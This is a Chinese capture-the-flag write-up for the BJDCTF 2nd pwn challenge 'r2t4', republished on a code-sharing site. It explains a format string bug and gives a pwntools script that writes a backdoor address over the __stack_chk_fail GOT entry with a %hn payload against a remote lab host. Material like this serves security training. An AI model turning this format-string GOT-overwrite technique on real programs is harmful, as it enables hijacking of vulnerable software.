[BJDCTF 2nd]r2t4的wp - 代码天地

[BJDCTF 2nd]r2t4的wp

其他 2021-03-06 19:14:39 阅读次数: 0

在这里插入图片描述
一看这是个格式化字符串漏洞

主函数在运行完后会执行__stack_chk_fail 是一金丝雀的一种，我们要把这个函数覆盖为backdoor函数
见got表

from pwn import *
 
context(arch='amd64',os='linux',word_size='64')
#p = process('./r2t4')

p = remote("node3.buuoj.cn",27166)
elf = ELF('./r2t4')
__stack_chk_fail = elf.got['__stack_chk_fail']

payload = "%64c%9$hn%1510c%10$hnAAA" + p64(__stack_chk_fail+2) + p64(__stack_chk_fail)
p.sendline(payload)
p.interactive()

猜你喜欢

转载自blog.csdn.net/wuyvle/article/details/113943418

[BJDCTF 2nd]r2t4的wp

CTF-Pwn-[BJDCTF 2nd]r2t4

[BJDCTF 2nd]r2t3

[BJDCTF 2nd]duangShell [BJDCTF 2nd]duangShell

[BJDCTF 2nd]elementmaster

BJDCTF 2nd WEB

BJDCTF 2nd writeup

[BJDCTF 2nd]duangShell

[BJDCTF 2nd]ydsneedgirlfriend2的wp

CTF-Pwn-[BJDCTF 2nd] r2t3

[BJDCTF 2nd]文件探测

[BJDCTF 2nd]fake google

[BJDCTF 2nd]old-hack

BJDCTF 2nd pwn Writeup

[BJDCTF 2nd]one_gadget

BUUOJ [BJDCTF 2nd]elementmaster

BJDCTF 2nd writeup(二)

[BJDCTF 2nd]Schrödinger

BJDCTF 2nd(WEB复现)

BUUCTF：[BJDCTF 2nd]EasyBaBa

[BJDCTF 2nd]简单注入

[BJDCTF 2nd] old-hack

BJDCTF2nd Reverser部分wp

BUUCTF [BJDCTF 2nd] BlockChain智能合约两则 wp

CTF-Pwn-[BJDCTF 2nd]one_gadget的wp

CTF-Pwn-[BJDCTF 2nd]ydsneedgirlfriend2

buuctf [BJDCTF 2nd]ydsneedgirlfriend2

[BUUOJ记录] [BJDCTF 2nd]fake google

buuoj BJDCTF 2nd one_gadget

[BJDCTF 2nd]duangShell（反弹shell，swp泄露）

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

让自己的头脑极度开放

CentOS 6.5(x64) 和Redhat6.5操作系误删libc

高可用注册中心

【日记】12.28/【题解】AtCoder AGC041

XML（5）_XML 约束_DTD

Java集合Map（四）

树梅派安装桌面环境教程

pipenv 的使用和安装

小程序白屏问题和内存研究

C语言简单选择排序

每日归档

更多

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)